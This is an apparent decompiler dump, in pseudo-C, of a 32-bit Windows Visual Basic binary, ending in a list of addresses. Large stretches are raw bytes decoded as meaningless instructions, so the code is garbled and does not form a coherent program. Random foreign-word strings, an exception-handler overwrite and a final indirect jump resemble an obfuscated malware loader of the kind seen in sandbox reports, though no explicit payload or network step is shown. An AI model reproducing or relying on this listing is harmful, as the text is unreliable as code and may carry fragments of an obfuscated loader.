											 *((intOrPtr*)(__eax - 0x1fffbfe1)) =  *((intOrPtr*)(__eax - 0x1fffbfe1)) + __ch;
											asm("sbb eax, 0x159e0040");
											__eax = __eax + 1;
											 *((intOrPtr*)(__ebp + __edx + 0x15aa0040)) =  *((intOrPtr*)(__ebp + __edx + 0x15aa0040)) + __ah;
											__eax = __eax + 1;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *((intOrPtr*)(__ecx + 0x3f04246c)) =  *((intOrPtr*)(__ecx + 0x3f04246c)) + __al;
											 *__eax =  *__eax + __al;
											__cl = __cl + __ch;
											asm("jecxz 0x76");
											 *__eax =  *__eax + __al;
											__eflags =  *__eax;
											_v1 = _v1 - 0x3f;
											__ebp = __esp;
											__esp = __esp - 0xc;
											__eax =  *[fs:0x0];
											 *[fs:0x0] = __esp;
											__eax = 0x158;
											L00401340();
											_v21 = __esp;
											_v17 = 0x401278;
											_v1 = _v1 & 0x00000001;
											_v13 = _v1 & 0x00000001;
											_v1 = _v1 & 0xfffffffe;
											_v1 = _v1 & 0xfffffffe;
											__eax = _v1;
											__eax =  *_v1;
											__eax =  *((intOrPtr*)( *_v1 + 4))(_v1, __edi, __esi, __ebx,  *[fs:0x0], 0x401346, __ebp);
											asm("fldz");
											_push(__ecx);
											_push(__ecx);
											 *__esp = __fp0;
											L004014AE();
											L004014B4();
											asm("fcomp qword [0x401270]");
											__eflags =  *0x413010;
											if( *0x413010 != 0) {
												_v244 = 0x413010;
											} else {
												_push(0x413010);
												_push(0x401de0);
												L00401592();
												_v244 = 0x413010;
											}
											_v244 =  *_v244;
											_v244 =  *_v244;
											__ecx =  *( *_v244);
											__eax =  *((intOrPtr*)( *( *_v244) + 0x2fc))( *_v244);
											__eax =  &_v80;
											L00401598();
											_v188 = __eax;
											__eax =  &_v84;
											__eax = _v188;
											__eax =  *_v188;
											__eax =  *((intOrPtr*)( *_v188 + 0x158))(_v188,  &_v84, __eax,  *_v244);
											asm("fclex");
											_v192 = __eax;
											__eflags = _v192;
											if(_v192 >= 0) {
												_t267 =  &_v248;
												 *_t267 = _v248 & 0x00000000;
												__eflags =  *_t267;
											} else {
												_push(0x158);
												_push(0x403c78);
												_push(_v188);
												_push(_v192);
												L0040158C();
												_v248 = __eax;
											}
											_push(0);
											_push(0);
											_push(_v84);
											__eax =  &_v116;
											_push( &_v116);
											L00401574();
											__esp = __esp + 0x10;
											__eflags =  *0x413010;
											if( *0x413010 != 0) {
												_v252 = 0x413010;
											} else {
												_push(0x413010);
												_push(0x401de0);
												L00401592();
												_v252 = 0x413010;
											}
											_v252 =  *_v252;
											_v252 =  *_v252;
											__ecx =  *( *_v252);
											__eax =  *((intOrPtr*)( *( *_v252) + 0x304))( *_v252);
											__eax =  &_v88;
											L00401598();
											_v196 = __eax;
											__eax =  &_v152;
											__eax = _v196;
											__eax =  *_v196;
											__eax =  *((intOrPtr*)( *_v196 + 0x130))(_v196,  &_v152, __eax,  *_v252);
											asm("fclex");
											_v200 = __eax;
											__eflags = _v200;
											if(_v200 >= 0) {
												_t287 =  &_v256;
												 *_t287 = _v256 & 0x00000000;
												__eflags =  *_t287;
											} else {
												_push(0x130);
												_push(0x403aa8);
												_push(_v196);
												_push(_v200);
												L0040158C();
												_v256 = __eax;
											}
											__eflags =  *0x413010;
											if( *0x413010 != 0) {
												_v260 = 0x413010;
											} else {
												_push(0x413010);
												_push(0x401de0);
												L00401592();
												_v260 = 0x413010;
											}
											_v260 =  *_v260;
											_v260 =  *_v260;
											__ecx =  *( *_v260);
											__eax =  *((intOrPtr*)( *( *_v260) + 0x2fc))( *_v260);
											__eax =  &_v92;
											L00401598();
											_v204 = __eax;
											__eax =  &_v156;
											__eax = _v204;
											__eax =  *_v204;
											__eax =  *((intOrPtr*)( *_v204 + 0x98))(_v204,  &_v156, __eax,  *_v260);
											asm("fclex");
											_v208 = __eax;
											__eflags = _v208;
											if(_v208 >= 0) {
												_t305 =  &_v264;
												 *_t305 = _v264 & 0x00000000;
												__eflags =  *_t305;
											} else {
												_push(0x98);
												_push(0x403c78);
												_push(_v204);
												_push(_v208);
												L0040158C();
												_v264 = __eax;
											}
											__ax = _v156;
											_v160 = _v156;
											_v168 = 0x5fb7d4;
											_v184 = 0xc002e180;
											_v180 = 0x5afd;
											__eax =  &_v164;
											__eax =  &_v160;
											__eax =  &_v168;
											__eax =  &_v116;
											L0040157A();
											__eax =  &_v184;
											__eax = _a4;
											__eax =  *_a4;
											__eax =  *((intOrPtr*)( *_a4 + 0x6f8))(_a4,  &_v184, 0x459b4a, __eax, __eax,  &_v168, 0x535, L"ERGODIC", _v152,  &_v160,  &_v164);
											_v212 = __eax;
											__eflags = _v212;
											if(_v212 >= 0) {
												_t326 =  &_v268;
												 *_t326 = _v268 & 0x00000000;
												__eflags =  *_t326;
											} else {
												_push(0x6f8);
												_push(0x402478);
												_push(_a4);
												_push(_v212);
												L0040158C();
												_v268 = __eax;
											}
											__ax = _v164;
											_v32 = __ax;
											__eax =  &_v84;
											_push( &_v84);
											__eax =  &_v92;
											_push( &_v92);
											__eax =  &_v88;
											_push( &_v88);
											__eax =  &_v80;
											_push( &_v80);
											_push(4);
											L00401568();
											__esp = __esp + 0x14;
											__ecx =  &_v116;
											L00401562();
											__eflags =  *0x413010;
											if( *0x413010 != 0) {
												_v272 = 0x413010;
											} else {
												_push(0x413010);
												_push(0x401de0);
												L00401592();
												_v272 = 0x413010;
											}
											_v272 =  *_v272;
											_v272 =  *_v272;
											__ecx =  *( *_v272);
											__eax =  *((intOrPtr*)( *( *_v272) + 0x300))( *_v272);
											__eax =  &_v80;
											L00401598();
											_v188 = __eax;
											__eax =  &_v152;
											__eax = _v188;
											__eax =  *_v188;
											__eax =  *((intOrPtr*)( *_v188 + 0x190))(_v188,  &_v152, __eax,  *_v272);
											asm("fclex");
											_v192 = __eax;
											__eflags = _v192;
											if(_v192 >= 0) {
												_t351 =  &_v276;
												 *_t351 = _v276 & 0x00000000;
												__eflags =  *_t351;
											} else {
												_push(0x190);
												_push(0x403c78);
												_push(_v188);
												_push(_v192);
												L0040158C();
												_v276 = __eax;
											}
											__eflags =  *0x413010;
											if( *0x413010 != 0) {
												_v280 = 0x413010;
											} else {
												_push(0x413010);
												_push(0x401de0);
												L00401592();
												_v280 = 0x413010;
											}
											_v280 =  *_v280;
											_v280 =  *_v280;
											__ecx =  *( *_v280);
											__eax =  *((intOrPtr*)( *( *_v280) + 0x2fc))( *_v280);
											__eax =  &_v84;
											L00401598();
											_v196 = __eax;
											__eax =  &_v168;
											__eax = _v196;
											__eax =  *_v196;
											__eax =  *((intOrPtr*)( *_v196 + 0x68))(_v196,  &_v168, __eax,  *_v280);
											asm("fclex");
											_v200 = __eax;
											__eflags = _v200;
											if(_v200 >= 0) {
												_t369 =  &_v284;
												 *_t369 = _v284 & 0x00000000;
												__eflags =  *_t369;
											} else {
												_push(0x68);
												_push(0x403c78);
												_push(_v196);
												_push(_v200);
												L0040158C();
												_v284 = __eax;
											}
											_v156 = 0x4d1e;
											_v172 = 0x56a744;
											__edx = L"Likviderende";
											__ecx =  &_v56;
											L00401556();
											__eax =  &_v156;
											__fp0 = _v168;
											 *__esp = _v168;
											__eax =  &_v172;
											__fp0 =  *0x401268;
											 *__esp =  *0x401268;
											__eax =  &_v56;
											__eax = _a4;
											__eax =  *_a4;
											__eax =  *((intOrPtr*)( *_a4 + 0x70c))(_a4, _v152, 0x44f6, L"Caingang", L"HEPATOPHYMA",  &_v56, __ecx, __ecx,  &_v172, __ecx,  &_v156);
											__ecx =  &_v56;
											L00401538();
											__eax =  &_v84;
											_push( &_v84);
											__eax =  &_v80;
											_push( &_v80);
											_push(2);
											L00401568();
											__esp = __esp + 0xc;
											__eflags =  *0x413010;
											if( *0x413010 != 0) {
												_v288 = 0x413010;
											} else {
												_push(0x413010);
												_push(0x401de0);
												L00401592();
												_v288 = 0x413010;
											}
											_v288 =  *_v288;
											_v288 =  *_v288;
											__ecx =  *( *_v288);
											__eax =  *((intOrPtr*)( *( *_v288) + 0x300))( *_v288);
											__eax =  &_v80;
											L00401598();
											_v188 = __eax;
											__eax =  &_v84;
											__eax = _v188;
											__eax =  *_v188;
											__eax =  *((intOrPtr*)( *_v188 + 0x130))(_v188,  &_v84, __eax,  *_v288);
											asm("fclex");
											_v192 = __eax;
											__eflags = _v192;
											if(_v192 >= 0) {
												_t401 =  &_v292;
												 *_t401 = _v292 & 0x00000000;
												__eflags =  *_t401;
											} else {
												_push(0x130);
												_push(0x403c78);
												_push(_v188);
												_push(_v192);
												L0040158C();
												_v292 = __eax;
											}
											_push(0);
											_push(0);
											_push(_v84);
											__eax =  &_v116;
											_push( &_v116); // executed
											L00401574(); // executed
											__esp = __esp + 0x10;
											__eflags =  *0x413010;
											if( *0x413010 != 0) {
												_v296 = 0x413010;
											} else {
												_push(0x413010);
												_push(0x401de0);
												L00401592();
												_v296 = 0x413010;
											}
											_v296 =  *_v296;
											_v296 =  *_v296;
											__ecx =  *( *_v296);
											__eax =  *((intOrPtr*)( *( *_v296) + 0x2fc))( *_v296);
											__eax =  &_v88;
											L00401598();
											_v196 = __eax;
											__eax =  &_v92;
											__eax = _v196;
											__eax =  *_v196;
											__eax =  *((intOrPtr*)( *_v196 + 0x158))(_v196,  &_v92, __eax,  *_v296);
											asm("fclex");
											_v200 = __eax;
											__eflags = _v200;
											if(_v200 >= 0) {
												_t421 =  &_v300;
												 *_t421 = _v300 & 0x00000000;
												__eflags =  *_t421;
											} else {
												_push(0x158);
												_push(0x403c78);
												_push(_v196);
												_push(_v200);
												L0040158C();
												_v300 = __eax;
											}
											_push(0);
											_push(0);
											_push(_v92);
											__eax =  &_v132;
											_push( &_v132);
											L00401574();
											__esp = __esp + 0x10;
											__eflags =  *0x413010;
											if( *0x413010 != 0) {
												_v304 = 0x413010;
											} else {
												_push(0x413010);
												_push(0x401de0);
												L00401592();
												_v304 = 0x413010;
											}
											_v304 =  *_v304;
											_v304 =  *_v304;
											__ecx =  *( *_v304);
											__eax =  *((intOrPtr*)( *( *_v304) + 0x2fc))( *_v304);
											__eax =  &_v96;
											L00401598();
											_v204 = __eax;
											__eax =  &_v168;
											__eax = _v204;
											__eax =  *_v204;
											__eax =  *((intOrPtr*)( *_v204 + 0x120))(_v204,  &_v168, __eax,  *_v304);
											asm("fclex");
											_v208 = __eax;
											__eflags = _v208;
											if(_v208 >= 0) {
												_t441 =  &_v308;
												 *_t441 = _v308 & 0x00000000;
												__eflags =  *_t441;
											} else {
												_push(0x120);
												_push(0x403c78);
												_push(_v204);
												_push(_v208);
												L0040158C();
												_v308 = __eax;
											}
											__eflags =  *0x413010;
											if( *0x413010 != 0) {
												_v312 = 0x413010;
											} else {
												_push(0x413010);
												_push(0x401de0);
												L00401592();
												_v312 = 0x413010;
											}
											_v312 =  *_v312;
											_v312 =  *_v312;
											__ecx =  *( *_v312);
											__eax =  *((intOrPtr*)( *( *_v312) + 0x300))( *_v312);
											__eax =  &_v100;
											L00401598();
											_v212 = __eax;
											__eax =  &_v172;
											__eax = _v212;
											__eax =  *_v212;
											__eax =  *((intOrPtr*)( *_v212 + 0x80))(_v212,  &_v172, __eax,  *_v312);
											asm("fclex");
											_v216 = __eax;
											__eflags = _v216;
											if(_v216 >= 0) {
												_t459 =  &_v316;
												 *_t459 = _v316 & 0x00000000;
												__eflags =  *_t459;
											} else {
												_push(0x80);
												_push(0x403c78);
												_push(_v212);
												_push(_v216);
												L0040158C();
												_v316 = __eax;
											}
											__edx = L"Fosterfordrivelsens";
											__ecx =  &_v64;
											L00401556();
											__fp0 = _v172;
											_v176 = _v172;
											__edx = L"Boligomraade";
											__ecx =  &_v60;
											L00401556();
											__fp0 =  *0x401260;
											_v184 =  *0x401260;
											__eax =  &_v64;
											__eax =  &_v176;
											__eax =  &_v60;
											__eax =  &_v132;
											L0040157A();
											__eax =  &_v116;
											L004014D2();
											__edx = __eax;
											__ecx =  &_v56;
											L00401508();
											__eax =  &_v184;
											__fp0 =  *0x401258;
											 *__esp =  *0x401258;
											__eax = _a4;
											__eax =  *_a4;
											__eax =  *((intOrPtr*)( *_a4 + 0x6fc))(_a4, __ecx, __ecx,  &_v184, __eax, __eax, __eax, __eax,  &_v60, _v168,  &_v176,  &_v64);
											_v220 = __eax;
											__eflags = _v220;
											if(_v220 >= 0) {
												_t482 =  &_v320;
												 *_t482 = _v320 & 0x00000000;
												__eflags =  *_t482;
											} else {
												_push(0x6fc);
												_push(0x402478);
												_push(_a4);
												_push(_v220);
												L0040158C();
												_v320 = __eax;
											}
											__eax =  &_v64;
											_push( &_v64);
											__eax =  &_v60;
											_push( &_v60);
											__eax =  &_v56;
											_push( &_v56);
											_push(3);
											L0040156E();
											__esp = __esp + 0x10;
											__eax =  &_v92;
											_push( &_v92);
											__eax =  &_v84;
											_push( &_v84);
											__eax =  &_v100;
											_push( &_v100);
											__eax =  &_v96;
											_push( &_v96);
											__eax =  &_v88;
											_push( &_v88);
											__eax =  &_v80;
											_push( &_v80);
											_push(6);
											L00401568();
											__esp = __esp + 0x1c;
											__eax =  &_v132;
											_push( &_v132);
											__eax =  &_v116;
											_push( &_v116);
											_push(2);
											L0040153E();
											__esp = __esp + 0xc;
											__eflags =  *0x413010;
											if( *0x413010 != 0) {
												_v324 = 0x413010;
											} else {
												_push(0x413010);
												_push(0x401de0);
												L00401592();
												_v324 = 0x413010;
											}
											_v324 =  *_v324;
											_v324 =  *_v324;
											__ecx =  *( *_v324);
											__eax =  *((intOrPtr*)( *( *_v324) + 0x2fc))( *_v324);
											__eax =  &_v80;
											L00401598();
											_v188 = __eax;
											__eax =  &_v56;
											__eax = _v188;
											__eax =  *_v188;
											__eax =  *((intOrPtr*)( *_v188 + 0x110))(_v188,  &_v56, __eax,  *_v324);
											asm("fclex");
											_v192 = __eax;
											__eflags = _v192;
											if(_v192 >= 0) {
												_t511 =  &_v328;
												 *_t511 = _v328 & 0x00000000;
												__eflags =  *_t511;
											} else {
												_push(0x110);
												_push(0x403c78);
												_push(_v188);
												_push(_v192);
												L0040158C();
												_v328 = __eax;
											}
											__eflags =  *0x413010;
											if( *0x413010 != 0) {
												_v332 = 0x413010;
											} else {
												_push(0x413010);
												_push(0x401de0);
												L00401592();
												_v332 = 0x413010;
											}
											_v332 =  *_v332;
											_v332 =  *_v332;
											__ecx =  *( *_v332);
											__eax =  *((intOrPtr*)( *( *_v332) + 0x308))( *_v332);
											__eax =  &_v84;
											L00401598();
											_v196 = __eax;
											__eax =  &_v88;
											__eax = _v196;
											__eax =  *_v196;
											__eax =  *((intOrPtr*)( *_v196 + 0x1b8))(_v196,  &_v88, __eax,  *_v332);
											asm("fclex");
											_v200 = __eax;
											__eflags = _v200;
											if(_v200 >= 0) {
												_t529 =  &_v336;
												 *_t529 = _v336 & 0x00000000;
												__eflags =  *_t529;
											} else {
												_push(0x1b8);
												_push(0x403aa8);
												_push(_v196);
												_push(_v200);
												L0040158C();
												_v336 = __eax;
											}
											_push(0);
											_push(0);
											_push(_v88);
											__eax =  &_v116;
											_push( &_v116);
											L00401574();
											__esp = __esp + 0x10;
											__eflags =  *0x413010;
											if( *0x413010 != 0) {
												_v340 = 0x413010;
											} else {
												_push(0x413010);
												_push(0x401de0);
												L00401592();
												_v340 = 0x413010;
											}
											_v340 =  *_v340;
											_v340 =  *_v340;
											__ecx =  *( *_v340);
											__eax =  *((intOrPtr*)( *( *_v340) + 0x304))( *_v340);
											__eax =  &_v92;
											L00401598();
											_v204 = __eax;
											__eax =  &_v60;
											__eax = _v204;
											__eax =  *_v204;
											__eax =  *((intOrPtr*)( *_v204 + 0x158))(_v204,  &_v60, __eax,  *_v340);
											asm("fclex");
											_v208 = __eax;
											__eflags = _v208;
											if(_v208 >= 0) {
												_t549 =  &_v344;
												 *_t549 = _v344 & 0x00000000;
												__eflags =  *_t549;
											} else {
												_push(0x158);
												_push(0x403aa8);
												_push(_v204);
												_push(_v208);
												L0040158C();
												_v344 = __eax;
											}
											__eax = _v60;
											_v232 = _v60;
											_v60 = _v60 & 0x00000000;
											__edx = _v232;
											__ecx =  &_v76;
											L00401508();
											__fp0 =  *0x401250;
											_v168 =  *0x401250;
											__edx = L"Naturforekomsten";
											__ecx =  &_v72;
											L00401556();
											__eax = _v56;
											_v236 = _v56;
											_v56 = _v56 & 0x00000000;
											__edx = _v236;
											__ecx =  &_v64;
											L00401508();
											__eax =  &_v76;
											__eax =  &_v168;
											__eax =  &_v72;
											__eax =  &_v116;
											L004014D2();
											__edx = __eax;
											__ecx =  &_v68;
											L00401508();
											__eax =  &_v64;
											__eax = _a4;
											__eax =  *_a4;
											 *((intOrPtr*)( *_a4 + 0x710))(_a4,  &_v64, __eax, __eax,  &_v72,  &_v168,  &_v76, 0x484f2760, 0x5afe) =  &_v76;
											_push( &_v76);
											__eax =  &_v72;
											_push( &_v72);
											__eax =  &_v68;
											_push( &_v68);
											__eax =  &_v64;
											_push( &_v64);
											_push(4);
											L0040156E();
											__esp = __esp + 0x14;
											__eax =  &_v88;
											_push( &_v88);
											__eax =  &_v92;
											_push( &_v92);
											__eax =  &_v84;
											_push( &_v84);
											__eax =  &_v80;
											_push( &_v80);
											_push(4);
											L00401568();
											__esp = __esp + 0x14;
											__ecx =  &_v116;
											L00401562();
											__eflags =  *0x413010;
											if( *0x413010 != 0) {
												_v348 = 0x413010;
											} else {
												_push(0x413010);
												_push(0x401de0);
												L00401592();
												_v348 = 0x413010;
											}
											_v348 =  *_v348;
											_v348 =  *_v348;
											__ecx =  *( *_v348);
											__eax =  *((intOrPtr*)( *( *_v348) + 0x30c))( *_v348);
											__eax =  &_v80;
											L00401598();
											_v188 = __eax;
											__eax =  &_v56;
											__eax = _v188;
											__eax =  *_v188;
											__eax =  *((intOrPtr*)( *_v188 + 0x50))(_v188,  &_v56, __eax,  *_v348);
											asm("fclex");
											_v192 = __eax;
											__eflags = _v192;
											if(_v192 >= 0) {
												_t599 =  &_v352;
												 *_t599 = _v352 & 0x00000000;
												__eflags =  *_t599;
											} else {
												_push(0x50);
												_push(0x403e24);
												_push(_v188);
												_push(_v192);
												L0040158C();
												_v352 = __eax;
											}
											__eflags =  *0x413010;
											if( *0x413010 != 0) {
												_v356 = 0x413010;
											} else {
												_push(0x413010);
												_push(0x401de0);
												L00401592();
												_v356 = 0x413010;
											}
											_v356 =  *_v356;
											_v356 =  *_v356;
											__ecx =  *( *_v356);
											__eax =  *((intOrPtr*)( *( *_v356) + 0x30c))( *_v356);
											__eax =  &_v84;
											L00401598();
											_v196 = __eax;
											__eax =  &_v168;
											__eax = _v196;
											__eax =  *_v196;
											__eax =  *((intOrPtr*)( *_v196 + 0x88))(_v196,  &_v168, __eax,  *_v356);
											asm("fclex");
											_v200 = __eax;
											__eflags = _v200;
											if(_v200 >= 0) {
												_t617 =  &_v360;
												 *_t617 = _v360 & 0x00000000;
												__eflags =  *_t617;
											} else {
												_push(0x88);
												_push(0x403e24);
												_push(_v196);
												_push(_v200);
												L0040158C();
												_v360 = __eax;
											}
											__fp0 = _v168;
											_v172 = _v168;
											__eax = _v56;
											_v240 = _v56;
											_v56 = _v56 & 0x00000000;
											__edx = _v240;
											__ecx =  &_v60;
											L00401508();
											__eax =  &_v176;
											__eax =  &_v172;
											__fp0 =  *0x401248;
											 *__esp =  *0x401248;
											__eax =  &_v60;
											__eax = _a4;
											__eax =  *_a4;
											__eax =  *((intOrPtr*)( *_a4 + 0x700))(_a4,  &_v60, __ecx, __ecx,  &_v172,  &_v176);
											_v204 = __eax;
											__eflags = _v204;
											if(_v204 >= 0) {
												_t638 =  &_v364;
												 *_t638 = _v364 & 0x00000000;
												__eflags =  *_t638;
											} else {
												_push(0x700);
												_push(0x402478);
												_push(_a4);
												_push(_v204);
												L0040158C();
												_v364 = __eax;
											}
											__fp0 = _v176;
											_v52 = _v176;
											__ecx =  &_v60;
											L00401538();
											__eax =  &_v84;
											__eax =  &_v80;
											L00401568();
											__esp = __esp + 0xc;
											__eax = _a4;
											__eax =  *_a4;
											__eax =  *((intOrPtr*)( *_a4 + 0x2b4))(_a4, 2,  &_v80,  &_v84);
											asm("fclex");
											_v188 = __eax;
											__eflags = _v188;
											if(_v188 >= 0) {
												_t653 =  &_v368;
												 *_t653 = _v368 & 0x00000000;
												__eflags =  *_t653;
											} else {
												_push(0x2b4);
												_push(0x402448);
												_push(_a4);
												_push(_v188);
												L0040158C();
												_v368 = __eax;
											}
											while(1) {
												_v140 = 1;
												_v148 = 2;
												__eax =  &_v48;
												_push( &_v48);
												__eax =  &_v148;
												_push( &_v148);
												__eax =  &_v116;
												_push(__eax);
												L004014A2();
												__edx = __eax;
												__ecx =  &_v48;
												L004014A8();
												_v140 = 0x2ffff;
												_v148 = 0x8003;
												__eax =  &_v48;
												_push( &_v48);
												__eax =  &_v148;
												_push( &_v148);
												L0040149C();
												__eax = __ax;
												__eflags = __ax;
												if(__ax == 0) {
													break;
												}
											}
											__esi = 0x4082db;
											_push(0x4082db);
											goto ( *__esp);
										}
										if(__eflags < 0) {
											goto L53;
										}
										asm("insb");
										if(__eflags < 0) {
											goto L54;
										}
										_t55 = __ecx + 0x6b;
										 *_t55 =  *(__ecx + 0x6b) + __dl;
										__eflags =  *_t55;
										if(__eflags == 0) {
											goto L54;
										}
										if(__eflags >= 0) {
											goto L56;
										}
										__esp =  *__edi * 0x4e555200;
										__esp = 1 +  *__edi * 0x4e555200;
										_push(1 +  *__edi * 0x4e555200);
										_push(__ebp);
										_push(__edx);
										__ebp =  &_a1;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __dl;
										 *__eax =  *__eax + __al;
										_push(__ecx);
										goto L49;
									}
								}
								 *0x78 =  *0x78 + __al;
								asm("cmpsd");
								__eax = __eax | 0x04120c3f;
								__bh = __bh + __bh;
								__al = __al +  *(__eax + __eax);
								 *__eax =  *__eax + __al;
								__eflags =  *__eax;
								L36:
								_t38 = __esi + 0x42;
								 *_t38 =  *(__esi + 0x42) + __dl;
								__eflags =  *_t38;
								L37:
								__edx = __edx + 1;
								__eax = __eax ^ 0x2a263621;
								 *__eax =  *__eax + __al;
								 *__eax =  *__eax + __al;
								 *__eax =  *__eax + __al;
								 *__eax =  *__eax + __al;
								 *__eax =  *__eax + __al;
								__eflags =  *__eax;
								L38:
								 *__eax =  *__eax + __al;
								 *__esi =  *__esi + __bh;
								 *__eax =  *__eax + __al;
								 *__eax =  *__eax + __al;
								 *__eax =  *__eax + __al;
								 *__eax =  *__eax + __al;
								 *__eax =  *__eax + __al;
								 *__eax =  *__eax + __al;
								__al = __al |  *__eax;
								 *(__eax + __eax) =  *(__eax + __eax) | __eax;
								 *__eax =  *__eax + __al;
								 *__eax =  *__eax + __al;
								 *__eax =  *__eax + __al;
								 *__eax =  *__eax + __al;
								 *((intOrPtr*)(__ebx + __ebx - 0xfe3ffc0)) =  *((intOrPtr*)(__ebx + __ebx - 0xfe3ffc0)) + __ah;
								 *__eax =  *__eax ^ __al;
								__bh = __bh + __bh;
								asm("invalid");
								 *__eax =  *__eax | __al;
								 *__eax =  *__eax + __al;
								 *__eax =  *__eax + __eax;
								 *__eax =  *__eax + __al;
								__eflags =  *__eax;
								__al = __al +  *__eax;
								 *__eax =  *__eax + __al;
								goto L40;
							}
							 *__edx =  *__edx + __al;
							__al = __al + 0xf0;
							 *__eax =  *__eax + __bh;
							__eflags =  *__eax;
							__edi = 0xb01ef04;
							L31:
							__al = __al + 0xef;
							 *__ebx =  *__ebx + __ecx;
							asm("str word [eax+0x59]");
							__edi = __edi + 1;
							__edi = __edi + 1;
							__ebp =  &_a1;
							_push(__ebx);
							_push(__eax);
							_push(__edx);
							__ebp =  &_a1;
							__esp = __esp + 1;
							__ebp =  &_a1;
							_push(__edx);
							__ebp =  &_a1;
							__esi = __esi - 1;
							_push(__ebx);
							 *__edx =  *__edx + __dl;
							 *__eax =  *__eax + __al;
							__eflags =  *__eax;
							L32:
							__bh = __bh + __bh;
							__esp = __esp +  *__esi;
							__eflags = __esp;
							L33:
							 *[es:eax] =  *[es:eax] + __al;
							 *0x72460006 =  *0x72460006 + __al;
							asm("popad");
							asm("insd");
							 *[gs:eax] =  *[gs:eax] ^ __eax;
							__eflags =  *[gs:eax];
							goto L34;
						}
						if (__eflags >= 0) goto L16;
						__al = __al + 0x80;
						_pop(es);
						__eax = __eax - 1;
						__edi = __edi +  *((intOrPtr*)(__edi + 0x1101ef04));
						__eax = __eax +  *__eax;
						 *__ebx =  *__ebx + 1;
						asm("das");
						 *__eax =  *__eax + __al;
						 *__edx =  *__edx + __al;
						 *__eax =  *__eax | __al;
						__ebx = __ebx + 1;
						asm("outsd");
						asm("insd");
						L17:
						asm("insd");
						asm("popad");
						L18:
						asm("outsb");
						 *[fs:eax] =  *[fs:eax] ^ __eax;
						__al = __al + 1;
						__eax = __eax | 0x6c657400;
						__eflags = __eax;
						asm("gs outsw");
						asm("outsb");
						if(__eflags == 0) {
							goto L32;
						}
						asm("gs outsb");
						if (__eflags >= 0) goto L20;
						__al = __al + 0x78;
						 *((intOrPtr*)(__eax + 3)) =  *((intOrPtr*)(__eax + 3)) + __cl;
						__edi = 0x1101ef04;
						__al = __al +  *__eax;
						 *__ebx =  *__ebx + 1;
						 *__eax =  *__eax - __eax;
						 *__eax =  *__eax + __al;
						__eax = __eax +  *0x78655400;
						__eflags = __eax;
						if(__eax == 0) {
							goto L31;
						} else {
							 *__edx =  *__edx + __al;
							__al = __al + 0xf8;
							__eflags = __al;
							_pop(es);
							if (__al < 0) goto L22;
							__edi = 0xb01ef04;
							__al = __al |  *__eax;
							__ecx = __ecx - 1;
							__eflags = __ecx;
							asm("outsb");
							if(__eflags == 0) {
								goto L36;
							} else {
								if(__eflags < 0) {
									goto L37;
								}
								if(__eflags >= 0) {
									goto L38;
								}
								if(__eflags < 0) {
									goto L33;
								}
								 *__edx =  *__edx + __dl;
								__eflags =  *__edx;
								L27:
								asm("adc al, [ecx]");
								__bh = __bh + __bh;
								__ebp = __ebp +  *__esi;
								 *__eax =  *__eax + __al;
								__eflags =  *__eax;
								goto L28;
							}
						}
					}
					if(__eflags == 0) {
						L13:
						if (__eflags < 0) goto L28;
						goto L14;
					}
					asm("bound ebp, [ebp+0x72]");
					__ebp =  *(__esi + 0x67) * 0x656e7265;
					__eflags = __ebp;
					if (__ebp >= 0) goto L7;
					asm("sbb [ecx], eax");
					 *__edx =  *__edx + __al;
					__al = __al &  *0x77af8e44;
					__al = __al & 0x00000014;
					_t19 = __esi + 0x65;
					 *_t19 =  *(__esi + 0x65) + __al;
					__eflags =  *_t19;
					_push(0x6c);
					if(__eflags < 0) {
						goto L18;
					} else {
						if(__eflags == 0) {
							goto L17;
						}
						asm("bound ebp, [ebp+0x72]");
						__ebp =  *(__esi + 0x67) * 0x656e7265;
						__eflags = __ebp;
						if (__ebp >= 0) goto L10;
						__eax = __eax ^ 0x000013e2;
						__ebx =  *__ebx * 0x14de0000;
						 *__eax =  *__eax + __al;
						asm("iretd");
						_push(cs);
						 *__eax =  *__eax + __al;
						__esp = __esp + 1;
						 *((intOrPtr*)(__esi + 3)) =  *((intOrPtr*)(__esi + 3)) + __al;
						 *0x77af8e44 =  *0x77af8e44 + 1;
						__al = __al ^  *__eax;
						 *__eax =  *__eax + __al;
						 *__eax =  *__eax + 0x77af8e44;
						 *((intOrPtr*)(__ebx + 0x6f)) =  *((intOrPtr*)(__ebx + 0x6f)) + __al;
						asm("insd");
						asm("insd");
						asm("popad");
						asm("outsb");
						__al = __al ^  *[fs:eax];
						__al = __al + 1;
						__eflags = __al;
						asm("adc [eax], al");
						if(__al <= 0) {
							goto L27;
						} else {
							__esi =  *(__ebx + 0x74) * 0x65;
							__eflags = __esi;
							if(__esi >= 0) {
								goto L29;
							}
							__esp = _a114 * 0x73656e;
							__eflags = __esp;
							goto L13;
						}
					}
				}
				asm("pushfd");
				asm("adc [eax], al");
				return __imp__EVENT_SINK_Release();
			}

0x004015b8
0x004015ba
0x004015ba
0x004015bb
0x004015bc
0x004015be
0x004015bf
0x004015c1
0x004015c3
0x004015c5
0x004015c7
0x004015c9
0x004015cb
0x004015ce
0x004015d0
0x004015d2
0x004015d4
0x004015d4
0x004015d4
0x004015d4
0x004015d7
0x004015d9
0x004015da
0x004015df
0x004015e0
0x004015e2
0x004015e3
0x004015e5
0x004015e7
0x004015e9
0x004015eb
0x004015ed
0x004015ef
0x004015f1
0x004015f2
0x004015f4
0x004015f5
0x004015f6
0x004015f7
0x004015f8
0x004015f9
0x004015fa
0x004015fb
0x004015fc
0x004015fe
0x004015ff
0x00401601
0x00401604
0x00401606
